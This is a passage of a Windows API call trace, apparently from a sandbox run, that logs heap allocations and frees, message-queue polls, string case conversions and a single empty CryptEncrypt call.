Flags=0x0, Size=0x8) returned 0x24b2ce8 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.234] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0166.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0166.235] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0166.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.235] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0166.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.236] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0166.236] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.236] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0166.236] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.236] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0166.237] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.237] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.237] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.237] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.237] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.237] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.237] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.238] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.238] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0166.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.239] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.239] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0166.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.243] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: 